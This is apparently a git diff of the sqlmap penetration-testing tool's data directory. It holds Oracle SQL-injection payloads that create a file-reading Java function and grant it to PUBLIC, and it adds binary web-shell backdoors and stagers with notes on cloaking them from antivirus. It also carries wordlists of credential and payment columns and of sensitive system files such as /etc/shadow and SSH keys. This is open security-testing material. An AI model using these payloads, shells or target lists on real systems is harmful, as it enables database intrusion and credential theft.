SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function 
OSREADFILE(filename in varchar2) return varchar2 as language java name ''''''''OsUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) FROM DUAL +SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on OSREADFILE to public'''';END;'';END;--','SYS',0,'1',0) FROM DUAL diff --git a/procs/postgresql/dns_request.sql b/data/procs/postgresql/dns_request.sql similarity index 80% rename from procs/postgresql/dns_request.sql rename to data/procs/postgresql/dns_request.sql index dd04d86632f..6724af223cc 100644 --- a/procs/postgresql/dns_request.sql +++ b/data/procs/postgresql/dns_request.sql @@ -1,4 +1,5 @@ DROP TABLE IF EXISTS %RANDSTR1%; +# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required CREATE TABLE %RANDSTR1%(%RANDSTR2% text); CREATE OR REPLACE FUNCTION %RANDSTR3%() RETURNS VOID AS $$ diff --git a/data/shell/README.txt b/data/shell/README.txt new file mode 100644 index 00000000000..4c64c411648 --- /dev/null +++ b/data/shell/README.txt @@ -0,0 +1,7 @@ +Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../../extra/cloak/cloak.py utility. + +To prepare the original scripts to the cloaked form use this command: +find backdoors/backdoor.* stagers/stager.* -type f -exec python ../../extra/cloak/cloak.py -i '{}' \; + +To get back them into the original form use this: +find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../../extra/cloak/cloak.py -d -i '{}' \; diff --git a/data/shell/backdoors/backdoor.asp_ b/data/shell/backdoors/backdoor.asp_ new file mode 100644 index 00000000000..8d82ec3bd34 Binary files /dev/null and b/data/shell/backdoors/backdoor.asp_ differ diff --git a/data/shell/backdoors/backdoor.aspx_ b/data/shell/backdoors/backdoor.aspx_ new file mode 100644 index 00000000000..4b27111e5a5 Binary files /dev/null and b/data/shell/backdoors/backdoor.aspx_ differ diff --git a/data/shell/backdoors/backdoor.cfm_ b/data/shell/backdoors/backdoor.cfm_ new file mode 100644 index 00000000000..dce65debacb Binary files /dev/null and b/data/shell/backdoors/backdoor.cfm_ differ diff --git a/data/shell/backdoors/backdoor.jsp_ b/data/shell/backdoors/backdoor.jsp_ new file mode 100644 index 00000000000..c28a51a5abf Binary files /dev/null and b/data/shell/backdoors/backdoor.jsp_ differ diff --git a/data/shell/backdoors/backdoor.php_ b/data/shell/backdoors/backdoor.php_ new file mode 100644 index 00000000000..313b4a89b19 Binary files /dev/null and b/data/shell/backdoors/backdoor.php_ differ diff --git a/data/shell/stagers/stager.asp_ b/data/shell/stagers/stager.asp_ new file mode 100644 index 00000000000..424e85b64e6 Binary files /dev/null and b/data/shell/stagers/stager.asp_ differ diff --git a/data/shell/stagers/stager.aspx_ b/data/shell/stagers/stager.aspx_ new file mode 100644 index 00000000000..acbf840bc04 Binary files /dev/null and b/data/shell/stagers/stager.aspx_ differ diff --git a/data/shell/stagers/stager.cfm_ b/data/shell/stagers/stager.cfm_ new file mode 100644 index 00000000000..8193566e523 Binary files /dev/null and b/data/shell/stagers/stager.cfm_ differ diff --git 
a/data/shell/stagers/stager.jsp_ b/data/shell/stagers/stager.jsp_ new file mode 100644 index 00000000000..f1c0feb3384 Binary files /dev/null and b/data/shell/stagers/stager.jsp_ differ diff --git a/data/shell/stagers/stager.php_ b/data/shell/stagers/stager.php_ new file mode 100644 index 00000000000..945a37e80c4 Binary files /dev/null and b/data/shell/stagers/stager.php_ differ diff --git a/txt/common-columns.txt b/data/txt/common-columns.txt similarity index 90% rename from txt/common-columns.txt rename to data/txt/common-columns.txt index 101747d0845..a3d425bee12 100644 --- a/txt/common-columns.txt +++ b/data/txt/common-columns.txt @@ -1,5 +1,5 @@ -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission id name @@ -471,8 +471,10 @@ settingsid lname sale_date module_addr +flag # spanish + usuario nombre contrasena @@ -483,8 +485,11 @@ llave chaveta tono cuna +correo +contrasenia # german + benutzername benutzer passwort @@ -498,6 +503,7 @@ stichwort schlusselwort # french + utilisateur usager consommateur @@ -509,6 +515,7 @@ touche clef # italian + utente nome utilizzatore @@ -520,17 +527,109 @@ chiavetta cifrario # portuguese + usufrutuario chave cavilha # slavic + korisnik sifra lozinka kljuc +# turkish + +isim +ad +adi +soyisim +soyad +soyadi +kimlik +kimlikno +tckimlikno +tckimlik +yonetici +sil +silinmis +numara +sira +lokasyon +kullanici +kullanici_adi +sifre +giris +pasif +posta +adres +is_adres +ev_adres +is_adresi +ev_adresi +isadresi +isadres +evadresi +evadres +il +ilce +eposta +eposta_adres +epostaadres +eposta_adresi +epostaadresi +e-posta +e-posta_adres +e-postaadres +e-posta_adresi +e-postaadresi +e_posta +e_posta_adres +e_postaadres +e_posta_adresi +e_postaadresi +baglanti +gun +ay +yil +saat +tarih +guncelleme +guncellemetarih +guncelleme_tarih +guncellemetarihi +guncelleme_tarihi +yetki +cinsiyet +ulke +guncel +vergi +vergino +vergi_no +yas +dogum +dogumtarih +dogum_tarih +dogumtarihi +dogum_tarihi +telefon_is +telefon_ev +telefonis +telefonev +ev_telefonu +is_telefonu +ev_telefon +is_telefon +evtelefonu +istelefonu +evtelefon +istelefon +kontak +kontaklar + # List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py) + user pass cc_number @@ -701,7 +800,9 @@ news nick number nummer +passhash pass_hash +password_hash passwordsalt personal_key phone @@ -754,6 +855,7 @@ xar_name xar_pass # List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html + account accnts accnt @@ -823,6 +925,7 @@ user_pwd user_passwd # List from hyrax (http://sla.ckers.org/forum/read.php?16,36047) + fld_id fld_username fld_password @@ -975,6 +1078,7 @@ yhmm yonghu # site:br + content_id codigo geometry @@ -1231,6 +1335,7 @@ newssummaryauthor and_xevento # site:de + rolle_nr standort_nr ja @@ -1393,6 +1498,7 @@ summary_id gameid # site:es + catid dni prune_id @@ -1482,6 +1588,7 @@ time_stamp bannerid # site:fr + numero id_auteur titre @@ -1533,6 +1640,7 @@ n_dir age # site:ru + dt_id subdivision_id sub_class_id @@ -1736,8 +1844,13 @@ banner_id error language_id val +parol +familiya +imya +otchestvo # site:jp + dealer_id modify_date regist_date @@ -1869,6 +1982,7 @@ c_commu_topic_id c_diary_comment_log_id # site:it + idcomune idruolo idtrattamento @@ -2372,6 +2486,7 @@ client_img does_repeat # site:cn + typeid cronid advid @@ -2545,3 +2660,195 @@ command brand_id disablepostctrl fieldname + +# site:id + 
+ajar +akses +aktif +akun +alamat +batas +cabang +deskripsi +foto +harga +hp +jeda +jenis +jml +judul +jumlah +kata_kunci +kata_sandi +katakunci +katasandi +kategori +kelas +keterangan +kode +kunci +lahir +nama +nama_akun +nama_ibu_kandung +nama_pengguna +namaakun +namapengguna +pekerjaan +pendidikan +pengguna +penjelasan +perusahaan +ponsel +profesi +ruang +sandi +soal +surat_elektronik +surel +tanggal +tanggal_lahir +telepon +tempat +tempat_lahir +tmp_lahir +universitas +urut +waktu + +# WebGoat + +cookie +login_count + +# https://sqlwiki.netspi.com/attackQueries/dataTargeting/ + +credit +card +pin +cvv +pan +password +social +ssn +account +confidential + +# site:nl + +naam +straat +gemeente +beschrijving +id_gebruiker +gebruiker_id +gebruikersnaam +wachtwoord +telefoon +voornaam +achternaam +geslacht +huisnummer +gemeente +leeftijd + +# site:cn + +yonghuming +mima +xingming +xingbie +touxiang +youxiang +shouji + +# Misc + +u_pass +hashedPw + +# password (international) + +adgangskode +aikotoba +amho +bimilbeonho +codewort +contrasena +contrasenya +contrasinal +esmeramz +facalfare +fjalekalim +focalfaire +gagtnabar +geslo +gozarvazhe +gunho +haslo +heslo +hudyat +igamalokungena +iphasiwedi +javka +jelszo +kadavucol +kalameobur +kalimatumurur +kalimatusirr +kalmarsirri +katalaluan +katasandi +kennwort +kodeord +kodikos +kouling +kupiasoz +kupuhipa +kupukaranga +kupuuru +kupuwhakahipa +losen +losenord +lozinka +lykilord +matkhau +mima +nenosiri +nywila +okwuntughe +oroasina +oroigbaniwole +paeseuwodeu +parol +parola +parolachiave +paroladordine +parole +paroli +parolja +parool +parulle +pasahitza +pasfhocal +pasowardo +passord +passwort +pasuwado +pasvorto +rahatphan +ramzobur +salasana +salasona +santoysena +senha +sifra +sifre +sisma +slaptazodis +synthimatiko +tunnussana +wachtwoord +wachtwurd +wagwoord diff --git a/data/txt/common-files.txt b/data/txt/common-files.txt new file mode 100644 index 00000000000..d64015805e8 --- /dev/null +++ b/data/txt/common-files.txt @@ -0,0 +1,1809 @@ +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission + +# CTFs + +/flag +/flag.txt +/readflag + +# Reference: https://gist.github.com/sckalath/78ad449346171d29241a + +/apache/logs/access.log +/apache/logs/error.log +/bin/php.ini +/etc/alias +/etc/apache2/apache.conf +/etc/apache2/conf/httpd.conf +/etc/apache2/httpd.conf +/etc/apache/conf/httpd.conf +/etc/bash.bashrc +/etc/chttp.conf +/etc/crontab +/etc/crypttab +/etc/debian_version +/etc/exports +/etc/fedora-release +/etc/fstab +/etc/ftphosts +/etc/ftpusers +/etc/group +/etc/group- +/etc/hosts +/etc/http/conf/httpd.conf +/etc/httpd.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/httpd/logs/acces_log +/etc/httpd/logs/acces.log +/etc/httpd/logs/access_log +/etc/httpd/logs/access.log +/etc/httpd/logs/error_log +/etc/httpd/logs/error.log +/etc/httpd/php.ini +/etc/http/httpd.conf +/etc/inetd.conf +/etc/inittab +/etc/issue +/etc/issue.net +/etc/lighttpd.conf +/etc/login.defs +/etc/mandrake-release +/etc/motd +/etc/mtab +/etc/my.cnf +/etc/mysql/my.cnf +/etc/openldap/ldap.conf +/etc/os-release +/etc/pam.conf +/etc/passwd +/etc/passwd- +/etc/password.master +/etc/php4.4/fcgi/php.ini +/etc/php4/apache2/php.ini +/etc/php4/apache/php.ini +/etc/php4/cgi/php.ini +/etc/php5/apache2/php.ini +/etc/php5/apache/php.ini +/etc/php5/cgi/php.ini +/etc/php/apache2/php.ini +/etc/php/apache/php.ini +/etc/php/cgi/php.ini +/etc/php.ini +/etc/php/php4/php.ini +/etc/php/php.ini +/etc/profile +/etc/proftp.conf 
+/etc/proftpd/modules.conf +/etc/protpd/proftpd.conf +/etc/pure-ftpd.conf +/etc/pureftpd.passwd +/etc/pureftpd.pdb +/etc/pure-ftpd/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pure-ftpd/pureftpd.pdb +/etc/redhat-release +/etc/resolv.conf +/etc/samba/smb.conf +/etc/security/environ +/etc/security/group +/etc/security/limits +/etc/security/passwd +/etc/security/user +/etc/shadow +/etc/shadow- +/etc/slackware-release +/etc/sudoers +/etc/SUSE-release +/etc/sysctl.conf +/etc/vhcs2/proftpd/proftpd.conf +/etc/vsftpd.conf +/etc/vsftpd/vsftpd.conf +/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftpusers +/logs/access.log +/logs/error.log +/opt/apache2/conf/httpd.conf +/opt/apache/conf/httpd.conf +/opt/xampp/etc/php.ini +/private/etc/httpd/httpd.conf +/private/etc/httpd/httpd.conf.default +/root/.bash_history +/root/.ssh/id_rsa +/root/.ssh/id_rsa.pub +/root/.ssh/known_hosts +/tmp/access.log +/usr/apache2/conf/httpd.conf +/usr/apache/conf/httpd.conf +/usr/etc/pure-ftpd.conf +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/lib/security/mkuser.default +/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/httpd.conf +/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/access.log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/error.log +/usr/local/apache/conf/httpd.conf +/usr/local/apache/conf/php.ini +/usr/local/apache/httpd.conf +/usr/local/apache/logs/access_log +/usr/local/apache/logs/access.log +/usr/local/apache/logs/error_log +/usr/local/apache/logs/error.log +/usr/local/apache/logs/error. og +/usr/local/apps/apache2/conf/httpd.conf +/usr/local/apps/apache/conf/httpd.conf +/usr/local/etc/apache2/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache/vhosts.conf +/usr/local/etc/httpd/conf/httpd.conf +/usr/local/etc/php.ini +/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pureftpd.pdb +/usr/local/httpd/conf/httpd.conf +/usr/local/lib/php.ini +/usr/local/php4/httpd.conf +/usr/local/php4/httpd.conf.php +/usr/local/php4/lib/php.ini +/usr/local/php5/httpd.conf +/usr/local/php5/httpd.conf.php +/usr/local/php5/lib/php.ini +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.php +/usr/local/php/lib/php.ini +/usr/local/pureftpd/etc/pure-ftpd.conf +/usr/local/pureftpd/etc/pureftpd.pdb +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/Zend/etc/php.ini +/usr/sbin/pure-config.pl +/var/cpanel/cpanel.config +/var/lib/mysql/my.cnf +/var/local/www/conf/php.ini +/var/log/access_log +/var/log/access.log +/var/log/apache2/access_log +/var/log/apache2/access.log +/var/log/apache2/error_log +/var/log/apache2/error.log +/var/log/apache/access_log +/var/log/apache/access.log +/var/log/apache/error_log +/var/log/apache/error.log +/var/log/error_log +/var/log/error.log +/var/log/httpd/access_log +/var/log/httpd/access.log +/var/log/httpd/error_log +/var/log/httpd/error.log +/var/log/messages +/var/log/messages.1 +/var/log/user.log +/var/log/user.log.1 +/var/www/conf/httpd.conf +/var/www/html/index.html +/var/www/logs/access_log +/var/www/logs/access.log +/var/www/logs/error_log +/var/www/logs/error.log +/Volumes/webBackup/opt/apache2/conf/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf.default +/web/conf/php.ini + +# Reference: https://github.com/devcoinfet/Sqlmap_file_reader/blob/master/file_read.py + +/var/log/mysqld.log +/var/www/index.php + +# Reference: https://github.com/sqlmapproject/sqlmap/blob/master/lib/core/settings.py#L809-L810 + +/var/www/index.php +/usr/local/apache/index.php 
+/usr/local/apache2/index.php +/usr/local/www/apache22/index.php +/usr/local/www/apache24/index.php +/usr/local/httpd/index.php +/var/www/nginx-default/index.php +/srv/www/index.php + +/var/www/config.php +/usr/local/apache/config.php +/usr/local/apache2/config.php +/usr/local/www/apache22/config.php +/usr/local/www/apache24/config.php +/usr/local/httpd/config.php +/var/www/nginx-default/config.php +/srv/www/config.php + +# Reference: https://github.com/sqlmapproject/sqlmap/issues/3928 + +/srv/www/htdocs/index.php +/usr/local/apache2/htdocs/index.php +/usr/local/www/data/index.php +/var/apache2/htdocs/index.php +/var/www/htdocs/index.php +/var/www/html/index.php + +/srv/www/htdocs/config.php +/usr/local/apache2/htdocs/config.php +/usr/local/www/data/config.php +/var/apache2/htdocs/config.php +/var/www/htdocs/config.php +/var/www/html/config.php + +# Reference: https://www.gracefulsecurity.com/path-traversal-cheat-sheet-linux + +/etc/passwd +/etc/shadow +/etc/aliases +/etc/anacrontab +/etc/apache2/apache2.conf +/etc/apache2/httpd.conf +/etc/at.allow +/etc/at.deny +/etc/bashrc +/etc/bootptab +/etc/chrootUsers +/etc/chttp.conf +/etc/cron.allow +/etc/cron.deny +/etc/crontab +/etc/cups/cupsd.conf +/etc/exports +/etc/fstab +/etc/ftpaccess +/etc/ftpchroot +/etc/ftphosts +/etc/groups +/etc/grub.conf +/etc/hosts +/etc/hosts.allow +/etc/hosts.deny +/etc/httpd/access.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/httpd/logs/access_log +/etc/httpd/logs/access.log +/etc/httpd/logs/error_log +/etc/httpd/logs/error.log +/etc/httpd/php.ini +/etc/httpd/srm.conf +/etc/inetd.conf +/etc/inittab +/etc/issue +/etc/lighttpd.conf +/etc/lilo.conf +/etc/logrotate.d/ftp +/etc/logrotate.d/proftpd +/etc/logrotate.d/vsftpd.log +/etc/lsb-release +/etc/motd +/etc/modules.conf +/etc/motd +/etc/mtab +/etc/my.cnf +/etc/my.conf +/etc/mysql/my.cnf +/etc/network/interfaces +/etc/networks +/etc/npasswd +/etc/passwd +/etc/php4.4/fcgi/php.ini +/etc/php4/apache2/php.ini +/etc/php4/apache/php.ini +/etc/php4/cgi/php.ini +/etc/php4/apache2/php.ini +/etc/php5/apache2/php.ini +/etc/php5/apache/php.ini +/etc/php/apache2/php.ini +/etc/php/apache/php.ini +/etc/php/cgi/php.ini +/etc/php.ini +/etc/php/php4/php.ini +/etc/php/php.ini +/etc/printcap +/etc/profile +/etc/proftp.conf +/etc/proftpd/proftpd.conf +/etc/pure-ftpd.conf +/etc/pureftpd.passwd +/etc/pureftpd.pdb +/etc/pure-ftpd/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pure-ftpd/putreftpd.pdb +/etc/redhat-release +/etc/resolv.conf +/etc/samba/smb.conf +/etc/snmpd.conf +/etc/ssh/ssh_config +/etc/ssh/sshd_config +/etc/ssh/ssh_host_dsa_key +/etc/ssh/ssh_host_dsa_key.pub +/etc/ssh/ssh_host_key +/etc/ssh/ssh_host_key.pub +/etc/sysconfig/network +/etc/syslog.conf +/etc/termcap +/etc/vhcs2/proftpd/proftpd.conf +/etc/vsftpd.chroot_list +/etc/vsftpd.conf +/etc/vsftpd/vsftpd.conf +/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftpusers +/logs/pure-ftpd.log +/logs/security_debug_log +/logs/security_log +/opt/lampp/etc/httpd.conf +/opt/xampp/etc/php.ini +/proc/cpuinfo +/proc/filesystems +/proc/interrupts +/proc/ioports +/proc/meminfo +/proc/modules +/proc/mounts +/proc/stat +/proc/swaps +/proc/version +/proc/self/net/arp +/root/anaconda-ks.cfg +/usr/etc/pure-ftpd.conf +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/local/apache/conf/modsec.conf +/usr/local/apache/conf/php.ini +/usr/local/apache/log +/usr/local/apache/logs +/usr/local/apache/logs/access_log +/usr/local/apache/logs/access.log +/usr/local/apache/audit_log +/usr/local/apache/error_log 
+/usr/local/apache/error.log +/usr/local/cpanel/logs +/usr/local/cpanel/logs/access_log +/usr/local/cpanel/logs/error_log +/usr/local/cpanel/logs/license_log +/usr/local/cpanel/logs/login_log +/usr/local/cpanel/logs/stats_log +/usr/local/etc/httpd/logs/access_log +/usr/local/etc/httpd/logs/error_log +/usr/local/etc/php.ini +/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pureftpd.pdb +/usr/local/lib/php.ini +/usr/local/php4/httpd.conf +/usr/local/php4/httpd.conf.php +/usr/local/php4/lib/php.ini +/usr/local/php5/httpd.conf +/usr/local/php5/httpd.conf.php +/usr/local/php5/lib/php.ini +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.ini +/usr/local/php/lib/php.ini +/usr/local/pureftpd/etc/pure-ftpd.conf +/usr/local/pureftpd/etc/pureftpd.pdn +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/www/logs/httpd_log +/usr/local/Zend/etc/php.ini +/usr/sbin/pure-config.pl +/var/adm/log/xferlog +/var/apache2/config.inc +/var/apache/logs/access_log +/var/apache/logs/error_log +/var/cpanel/cpanel.config +/var/lib/mysql/my.cnf +/var/lib/mysql/mysql/user.MYD +/var/local/www/conf/php.ini +/var/log/apache2/access_log +/var/log/apache2/access.log +/var/log/apache2/error_log +/var/log/apache2/error.log +/var/log/apache/access_log +/var/log/apache/access.log +/var/log/apache/error_log +/var/log/apache/error.log +/var/log/apache-ssl/access.log +/var/log/apache-ssl/error.log +/var/log/auth.log +/var/log/boot +/var/htmp +/var/log/chttp.log +/var/log/cups/error.log +/var/log/daemon.log +/var/log/debug +/var/log/dmesg +/var/log/dpkg.log +/var/log/exim_mainlog +/var/log/exim/mainlog +/var/log/exim_paniclog +/var/log/exim.paniclog +/var/log/exim_rejectlog +/var/log/exim/rejectlog +/var/log/faillog +/var/log/ftplog +/var/log/ftp-proxy +/var/log/ftp-proxy/ftp-proxy.log +/var/log/httpd/access_log +/var/log/httpd/access.log +/var/log/httpd/error_log +/var/log/httpd/error.log +/var/log/httpsd/ssl.access_log +/var/log/httpsd/ssl_log +/var/log/kern.log +/var/log/lastlog +/var/log/lighttpd/access.log +/var/log/lighttpd/error.log +/var/log/lighttpd/lighttpd.access.log +/var/log/lighttpd/lighttpd.error.log +/var/log/mail.info +/var/log/mail.log +/var/log/maillog +/var/log/mail.warn +/var/log/message +/var/log/messages +/var/log/mysqlderror.log +/var/log/mysql.log +/var/log/mysql/mysql-bin.log +/var/log/mysql/mysql.log +/var/log/mysql/mysql-slow.log +/var/log/proftpd +/var/log/pureftpd.log +/var/log/pure-ftpd/pure-ftpd.log +/var/log/secure +/var/log/vsftpd.log +/var/log/wtmp +/var/log/xferlog +/var/log/yum.log +/var/mysql.log +/var/run/utmp +/var/spool/cron/crontabs/root +/var/webmin/miniserv.log +/var/www/log/access_log +/var/www/log/error_log +/var/www/logs/access_log +/var/www/logs/error_log +/var/www/logs/access.log +/var/www/logs/error.log + +# Reference: https://nets.ec/File_Inclusion + +/etc/passwd +/etc/master.passwd +/etc/shadow +/var/db/shadow/hash +/etc/group +/etc/hosts +/etc/motd +/etc/issue +/etc/release +/etc/redhat-release +/etc/crontab +/etc/inittab +/proc/version +/proc/cmdline +/proc/self/environ +/proc/self/fd/0 +/proc/self/fd/1 +/proc/self/fd/2 +/proc/self/fd/255 +/etc/httpd.conf +/etc/apache2.conf +/etc/apache2/apache2.conf +/etc/apache2/httpd.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/apache2/conf/httpd.conf +/etc/apache/conf/httpd.conf +/usr/local/apache2/conf/httpd.conf +/usr/local/apache/conf/httpd.conf +/etc/apache2/sites-enabled/000-default +/etc/apache2/sites-available/default +/etc/nginx.conf +/etc/nginx/nginx.conf +/etc/nginx/sites-available/default 
+/etc/nginx/sites-enabled/default +/etc/ssh/sshd_config +/etc/my.cnf +/etc/mysql/my.cnf +/etc/php.ini +/var/mail/www-data +/var/mail/www +/var/mail/apache +/var/mail/nobody +/var/www/.bash_history +/root/.bash_history +/var/root/.bash_history +/var/root/.sh_history +/etc/passwd +/etc/master.passwd +/etc/shadow +/var/db/shadow/hash +/etc/group +/etc/hosts +/etc/motd +/etc/issue +/etc/release +/etc/redhat-release +/etc/crontab +/etc/inittab +/proc/version +/proc/cmdline +/proc/self/environ +/proc/self/fd/0 +/proc/self/fd/1 +/proc/self/fd/2 +/proc/self/fd/255 +/etc/httpd.conf +/etc/apache2.conf +/etc/apache2/apache2.conf +/etc/apache2/httpd.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/apache2/conf/httpd.conf +/etc/apache/conf/httpd.conf +/usr/local/apache2/conf/httpd.conf +/usr/local/apache/conf/httpd.conf +/etc/apache2/sites-enabled/000-default +/etc/apache2/sites-available/default +/etc/nginx.conf +/etc/nginx/nginx.conf +/etc/nginx/sites-available/default +/etc/nginx/sites-enabled/default +/etc/ssh/sshd_config +/etc/my.cnf +/etc/mysql/my.cnf +/etc/php.ini +/var/mail/www-data +/var/mail/www +/var/mail/apache +/var/mail/nobody +/var/www/.bash_history +/root/.bash_history +/var/root/.bash_history +/var/root/.sh_history +/usr/local/apache/httpd.conf +/usr/local/apache2/httpd.conf +/usr/local/httpd/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache2/conf/httpd.conf +/usr/local/etc/httpd/conf/httpd.conf +/usr/apache2/conf/httpd.conf +/usr/apache/conf/httpd.conf +/etc/http/conf/httpd.conf +/etc/http/httpd.conf +/opt/apache/conf/httpd.conf +/opt/apache2/conf/httpd.conf +/var/www/conf/httpd.conf +/usr/local/php/httpd.conf +/usr/local/php4/httpd.conf +/usr/local/php5/httpd.conf +/etc/httpd/php.ini +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/local/etc/php.ini +/usr/local/lib/php.ini +/usr/local/php/lib/php.ini +/usr/local/php4/lib/php.ini +/usr/local/php5/lib/php.ini +/usr/local/apache/conf/php.ini +/etc/php4/apache/php.ini +/etc/php4/apache2/php.ini +/etc/php5/apache/php.ini +/etc/php5/apache2/php.ini +/etc/php/php.ini +/etc/php/php4/php.ini +/etc/php/apache/php.ini +/etc/php/apache2/php.ini +/usr/local/Zend/etc/php.ini +/opt/xampp/etc/php.ini +/var/local/www/conf/php.ini +/etc/php/cgi/php.ini +/etc/php4/cgi/php.ini +/etc/php5/cgi/php.ini +/var/log/lastlog +/var/log/wtmp +/var/run/utmp +/var/log/messages.log +/var/log/messages +/var/log/messages.0 +/var/log/messages.1 +/var/log/messages.2 +/var/log/messages.3 +/var/log/syslog.log +/var/log/syslog +/var/log/syslog.0 +/var/log/syslog.1 +/var/log/syslog.2 +/var/log/syslog.3 +/var/log/auth.log +/var/log/auth.log.0 +/var/log/auth.log.1 +/var/log/auth.log.2 +/var/log/auth.log.3 +/var/log/authlog +/var/log/syslog +/var/adm/lastlog +/var/adm/messages +/var/adm/messages.0 +/var/adm/messages.1 +/var/adm/messages.2 +/var/adm/messages.3 +/var/adm/utmpx +/var/adm/wtmpx +/var/log/kernel.log +/var/log/secure.log +/var/log/mail.log +/var/run/utmp +/var/log/wtmp +/var/log/lastlog +/var/log/access.log +/var/log/access_log +/var/log/error.log +/var/log/error_log +/var/log/apache2/access.log +/var/log/apache2/access_log +/var/log/apache2/error.log +/var/log/apache2/error_log +/var/log/apache/access.log +/var/log/apache/access_log +/var/log/apache/error.log +/var/log/apache/error_log +/var/log/httpd/access.log +/var/log/httpd/access_log +/var/log/httpd/error.log +/var/log/httpd/error_log +/etc/httpd/logs/access.log +/etc/httpd/logs/access_log +/etc/httpd/logs/error.log +/etc/httpd/logs/error_log 
+/usr/local/apache/logs/access.log +/usr/local/apache/logs/access_log +/usr/local/apache/logs/error.log +/usr/local/apache/logs/error_log +/usr/local/apache2/logs/access.log +/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/error.log +/usr/local/apache2/logs/error_log +/var/www/logs/access.log +/var/www/logs/access_log +/var/www/logs/error.log +/var/www/logs/error_log +/opt/lampp/logs/access.log +/opt/lampp/logs/access_log +/opt/lampp/logs/error.log +/opt/lampp/logs/error_log +/opt/xampp/logs/access.log +/opt/xampp/logs/access_log +/opt/xampp/logs/error.log +/opt/xampp/logs/error_log + +# Reference: https://github.com/ironbee/ironbee-rules/blob/master/rules/lfi-files.data + +/.htaccess +/.htpasswd +/access.log +/access_log +/apache/conf/httpd.conf +/apache/logs/access.log +/apache/logs/error.log +/apache/php/php.ini +/apache2/logs/access.log +/apache2/logs/error.log +/bin/php.ini +/boot.ini +/boot/grub/grub.cfg +/boot/grub/menu.lst +/config.inc.php +/error.log +/error_log +/etc/adduser.conf +/etc/alias +/etc/apache/access.conf +/etc/apache/apache.conf +/etc/apache/conf/httpd.conf +/etc/apache/default-server.conf +/etc/apache/httpd.conf +/etc/apache2/apache.conf +/etc/apache2/apache2.conf +/etc/apache2/conf.d/charset +/etc/apache2/conf.d/phpmyadmin.conf +/etc/apache2/conf.d/security +/etc/apache2/conf/httpd.conf +/etc/apache2/default-server.conf +/etc/apache2/envvars +/etc/apache2/httpd.conf +/etc/apache2/httpd2.conf +/etc/apache2/mods-available/autoindex.conf +/etc/apache2/mods-available/deflate.conf +/etc/apache2/mods-available/dir.conf +/etc/apache2/mods-available/mem_cache.conf +/etc/apache2/mods-available/mime.conf +/etc/apache2/mods-available/proxy.conf +/etc/apache2/mods-available/setenvif.conf +/etc/apache2/mods-available/ssl.conf +/etc/apache2/mods-enabled/alias.conf +/etc/apache2/mods-enabled/deflate.conf +/etc/apache2/mods-enabled/dir.conf +/etc/apache2/mods-enabled/mime.conf +/etc/apache2/mods-enabled/negotiation.conf +/etc/apache2/mods-enabled/php5.conf +/etc/apache2/mods-enabled/status.conf +/etc/apache2/ports.conf +/etc/apache2/sites-available/default +/etc/apache2/sites-available/default-ssl +/etc/apache2/sites-enabled/000-default +/etc/apache2/sites-enabled/default +/etc/apache2/ssl-global.conf +/etc/apache2/vhosts.d/00_default_vhost.conf +/etc/apache2/vhosts.d/default_vhost.include +/etc/apache22/conf/httpd.conf +/etc/apache22/httpd.conf +/etc/apt/apt.conf +/etc/avahi/avahi-daemon.conf +/etc/bash.bashrc +/etc/bash_completion.d/debconf +/etc/bluetooth/input.conf +/etc/bluetooth/main.conf +/etc/bluetooth/network.conf +/etc/bluetooth/rfcomm.conf +/etc/ca-certificates.conf +/etc/ca-certificates.conf.dpkg-old +/etc/casper.conf +/etc/chkrootkit.conf +/etc/chrootusers +/etc/clamav/clamd.conf +/etc/clamav/freshclam.conf +/etc/crontab +/etc/crypttab +/etc/cups/acroread.conf +/etc/cups/cupsd.conf 